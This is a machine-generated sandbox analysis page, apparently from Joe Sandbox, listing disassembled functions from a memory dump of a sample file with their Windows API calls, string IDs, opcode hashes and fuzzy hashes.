                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $CK$CK
                                              • API String ID: 3519838083-2957773085
                                              • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                              • Instruction ID: 5b5d11b605ac6febd153c6870eb2e8fe414387e00c5f4108e0e097cc27c14f6e
                                              • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                              • Instruction Fuzzy Hash: FB21B871E41209CFCB08EFE8C5805EEF7BAFF95314F14862AC811A7B91C7745A15CA51
                                              Function 6C260584 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 0$LrJ$x
                                              • API String ID: 3519838083-658305261
                                              • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                              • Instruction ID: a8103df67d60217cce74ad2afb29d400489aebe6d78533e698ea3eb16e84fa28
                                              • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                              • Instruction Fuzzy Hash: 05218E32D0121D9BDF05DBD8C990AEDB7B5EF58708F20015AE80177B80DB799E48DBA5
                                              Function 6C257EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C257ECC
                                                • Part of subcall function 6C24258A: __EH_prolog.LIBCMT ref: 6C24258F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: :hJ$dJ$xJ
                                              • API String ID: 3519838083-2437443688
                                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                              • Instruction ID: 21643baa6577ac4a682d30b65edba951b26849716f0a08e0a34e97f673b739fb
                                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                              • Instruction Fuzzy Hash: EA21E9B0801B44CFC760CF6AC14428ABBF4FF29708B40CA5EC4AA97B11D7B8A609CF55
                                              Function 6C20E480 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C20E7C0,6C0C1DEA,00008000,6C20E7C0,?,?,?,6C20E36F,6C20E7C0,?,00000000,6C0C1DEA), ref: 6C20E4B9
                                              • GetLastError.KERNEL32(?,?,?,6C20E36F,6C20E7C0,?,00000000,6C0C1DEA,?,6C217D8E,6C20E7C0,000000FF,000000FF,00000002,00008000,6C20E7C0), ref: 6C20E4C3
                                              • __dosmaperr.LIBCMT ref: 6C20E4CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer__dosmaperr
                                              • String ID: 8Q
                                              • API String ID: 2336955059-4022487301
                                              • Opcode ID: 6bcd63eb18071b4e36b87fff6125380a20c75ecd303eb09d6626d7ef667747dd
                                              • Instruction ID: d50fa9769e21a506555da27f196836e370db5b808581f871dfe3e8ccde9177bd
                                              • Opcode Fuzzy Hash: 6bcd63eb18071b4e36b87fff6125380a20c75ecd303eb09d6626d7ef667747dd
                                              • Instruction Fuzzy Hash: 7F01D83271451DABCB058F69CC44C9D3B7EEB86735728020AFD619B6D0EAB1D9418790
                                              Function 6C1FA1ED Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • AcquireSRWLockExclusive.KERNEL32(6C2F766C,?,652EF5AA,6C0C230E,6C2F730C), ref: 6C1FA1F7
                                              • ReleaseSRWLockExclusive.KERNEL32(6C2F766C), ref: 6C1FA22A
                                              • WakeAllConditionVariable.KERNEL32(6C2F7668), ref: 6C1FA235
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                              • String ID: lv/l
                                              • API String ID: 1466638765-1456510555
                                              • Opcode ID: a05d2c2115f672296c46d82490907b5a7e21df62f20ce2c437f99715f66afe6c
                                              • Instruction ID: 93a733b88251cb74bdadb8ea80f86ce4fb8dac7d1b7ce01e2a958b2e4d8194eb
                                              • Opcode Fuzzy Hash: a05d2c2115f672296c46d82490907b5a7e21df62f20ce2c437f99715f66afe6c
                                              • Instruction Fuzzy Hash: C9F03074644108DFCB05EF58E88CC547BB4EB4AB20B01802AED15C7380CB796802CFA4
                                              Function 6C24ED0E Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <J$DJ$HJ$TJ$]
                                              • API String ID: 0-686860805
                                              • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                              • Instruction ID: e87a276cae3ba764a3c787a55c25b1d0916b638d9da5319915ea3ca5ad72c427
                                              • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                              • Instruction Fuzzy Hash: 9741C470D0524EEBEF18DFA0D490CEEF774AF14218B50C169E92127A51EB35A649CB81
                                              Function 6C249331 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aulldiv
                                              • String ID:
                                              • API String ID: 3732870572-0
                                              • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                              • Instruction ID: 62b5e417983d81ed1c57cbc2b3f88f181d7fc7f74555e4dbfe1840c02efda077
                                              • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                              • Instruction Fuzzy Hash: 14119376600248BFEB259FA4CC40FAF7BBEEBC9754F00852DB98156690CA71AC54D760
                                              Function 6C2080A2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,6C202654,6C229DD0,0000000C), ref: 6C2080A7
                                              • _free.LIBCMT ref: 6C208104
                                              • _free.LIBCMT ref: 6C20813A
                                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C202654,6C229DD0,0000000C), ref: 6C208145
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorLast_free
                                              • String ID:
                                              • API String ID: 2283115069-0
                                              • Opcode ID: 9fa64770be20be8657d3bde8969b6817b1e065ff187536e0f292a504eaf268a3
                                              • Instruction ID: c9b1febd8c181cff938a86a83802ecf7d479c4986275ab1dd62acd2c31822403
                                              • Opcode Fuzzy Hash: 9fa64770be20be8657d3bde8969b6817b1e065ff187536e0f292a504eaf268a3
                                              • Instruction Fuzzy Hash: C311CA7134520DEFDB111A799CC8E9B226AAFC267D7250637FE3492AC1DF658C098610
                                              Function 6C2195AA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • WriteConsoleW.KERNEL32(00000000,?,6C217DDC,00000000,00000000,?,6C218241,00000000,00000001,00000000,6C20E7C0,?,6C20F976,?,?,6C20E7C0), ref: 6C2195C1
                                              • GetLastError.KERNEL32(?,6C218241,00000000,00000001,00000000,6C20E7C0,?,6C20F976,?,?,6C20E7C0,?,6C20E7C0,?,6C20F40C,6C2191A6), ref: 6C2195CD
                                                • Part of subcall function 6C21961E: CloseHandle.KERNEL32(FFFFFFFE,6C2195DD,?,6C218241,00000000,00000001,00000000,6C20E7C0,?,6C20F976,?,?,6C20E7C0,?,6C20E7C0), ref: 6C21962E
                                              • ___initconout.LIBCMT ref: 6C2195DD
                                                • Part of subcall function 6C2195FF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C21959B,6C21822E,6C20E7C0,?,6C20F976,?,?,6C20E7C0,?), ref: 6C219612
                                              • WriteConsoleW.KERNEL32(00000000,?,6C217DDC,00000000,?,6C218241,00000000,00000001,00000000,6C20E7C0,?,6C20F976,?,?,6C20E7C0,?), ref: 6C2195F2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                              • String ID:
                                              • API String ID: 2744216297-0
                                              • Opcode ID: 47ff97878924188ccd3baacb2adaa16b58cec5f6dd4b137109aade103038fb88
                                              • Instruction ID: 06b45d03b884abbf52ade396c586e8c6b3f49041385cb068478e6a5c6fa69e99
                                              • Opcode Fuzzy Hash: 47ff97878924188ccd3baacb2adaa16b58cec5f6dd4b137109aade103038fb88
                                              • Instruction Fuzzy Hash: A5F01C3660811DBBCF122F91CC48E893FB6FB4A7B1B044020FE1995A60DB328860DB91
                                              Function 6C231072 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 398COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C231077
                                                • Part of subcall function 6C230FF5: __EH_prolog.LIBCMT ref: 6C230FFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: :$\
                                              • API String ID: 3519838083-1166558509
                                              • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                              • Instruction ID: e495b93e5cb5f5dd9fbc6f5f3b31b28e6f79411710fdbac92ea5f81676425b2c
                                              • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                              • Instruction Fuzzy Hash: 1BE1E6B090032E9ACF11DFA4C890BDDB7B1BF0531CF106619EC5A6BA90DB75E589CB61
                                              Function 6C27D354 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 234COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog__aullrem
                                              • String ID: d%K
                                              • API String ID: 3415659256-3110269457
                                              • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                              • Instruction ID: c11fe237c78ecd26e0305e351cc895804c87892de34095efa573618b4dff2695
                                              • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                              • Instruction Fuzzy Hash: BC81BE71A0120E9BDF20CF58C490B9EB7F5AF8435EF248159EC58ABA40D775E909CBB1
                                              Function 6C206814 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID: 8Q
                                              • API String ID: 2427045233-4022487301
                                              • Opcode ID: 8a40dcf452ed5a454c0f58c9ffc6e83876f6ee75dc37ffd45b4aff6d280d747b
                                              • Instruction ID: 314048cd1d357bd09b8f35f5fc2707915e2c474123f4f325300a9ed265ed118b
                                              • Opcode Fuzzy Hash: 8a40dcf452ed5a454c0f58c9ffc6e83876f6ee75dc37ffd45b4aff6d280d747b
                                              • Instruction Fuzzy Hash: D071C470E4521F9BDB109F95C8C1BEE7AB5BF45319F24822BFC20A7A40DB758985C760
                                              Function 6C256C20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: @$hfJ
                                              • API String ID: 3519838083-1391159562
                                              • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                              • Instruction ID: ba25f5ab232cde991db547074b6226de9a2db6a30a8288afee4f9620438ccaf0
                                              • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                              • Instruction Fuzzy Hash: 5E912671911219DFCB10DFA9C8949DEFBB4BF18308F94451EE85AE7B90D770AA48CB10
                                              Function 6C24BC58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C24BC5D
                                                • Part of subcall function 6C24A61A: __EH_prolog.LIBCMT ref: 6C24A61F
                                                • Part of subcall function 6C24AA2E: __EH_prolog.LIBCMT ref: 6C24AA33
                                                • Part of subcall function 6C24BEA5: __EH_prolog.LIBCMT ref: 6C24BEAA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: WZJ
                                              • API String ID: 3519838083-1089469559
                                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                              • Instruction ID: a4506c74f08c79faf0b50cfeea33b66be1b00e1908bc5125a6903ab63b843de2
                                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                              • Instruction Fuzzy Hash: C0816C35D0055DDFCF19DFA8C980ADEB7B4AF09308F1081A9E90667790DB34AE09CBA1
                                              Function 6C0C28E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 6C0C2A76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ___std_exception_destroy
                                              • String ID: Jbx$Jbx
                                              • API String ID: 4194217158-1161259238
                                              • Opcode ID: 94ce811c77672c1b20e3a173fa3cf91f57d9679eea2e7da0d31682beef4e92eb
                                              • Instruction ID: ff99d864904868ea5f60dddf4148f284e9f6ccdbc1751c0a241fa95281891e6c
                                              • Opcode Fuzzy Hash: 94ce811c77672c1b20e3a173fa3cf91f57d9679eea2e7da0d31682beef4e92eb
                                              • Instruction Fuzzy Hash: D15102B1A002048BCB10CF58C88479EBBF5FF89314F15856EE8599BB40E335E985CB92
                                              Function 6C252F9C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: <dJ$Q
                                              • API String ID: 3519838083-2252229148
                                              • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                              • Instruction ID: c5018d3c9a0cbe64dcac4c154d51bca9ad72f066e60426c8619c5369f7f39b30
                                              • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                              • Instruction Fuzzy Hash: 56518D7190021EEBCF01DFA8C8808EEB7B1BF48308F50852EF915AB650DB759A5ACB50
                                              Function 6C24E9B9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $D^J
                                              • API String ID: 3519838083-3977321784
                                              • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                              • Instruction ID: eb475b2a2b37e5faf7e903392edbd6d37b6fa816064a9414775df22700888a6b
                                              • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                              • Instruction Fuzzy Hash: 15411221A045BE6BF72ADB28C4507E8FBA2BF07248F14C198DC9347AC1DB74588AC7D1
                                              Function 6C2105EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C217DC6), ref: 6C21070B
                                              • __dosmaperr.LIBCMT ref: 6C210712
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr
                                              • String ID: 8Q
                                              • API String ID: 1659562826-4022487301
                                              • Opcode ID: 1aef3da1478577b9dee581b88bdcf2473a579890b393f7e8e28b85b399439d87
                                              • Instruction ID: 296494566f055c04bf4405278916f505c3be740ecad796cd6c286d6522e7e581
                                              • Opcode Fuzzy Hash: 1aef3da1478577b9dee581b88bdcf2473a579890b393f7e8e28b85b399439d87
                                              • Instruction Fuzzy Hash: B941697161C1DDAFDB11DF29C880BA97FE5EB86314F184259EE948BE41D3719C22CB90
                                              Function 6C26812C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: X&L$p|J
                                              • API String ID: 3519838083-2944591232
                                              • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                              • Instruction ID: 4aac963cbc905633d68e7db86051cc1ce54efa9004a168d979146f6a5dfe15a0
                                              • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                              • Instruction Fuzzy Hash: 7631283168558ECBD7109B5EDD01FA97771EB03719F200167ED50A2EA2CB6089C5CB75
                                              Function 6C267C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 0|J$`)L
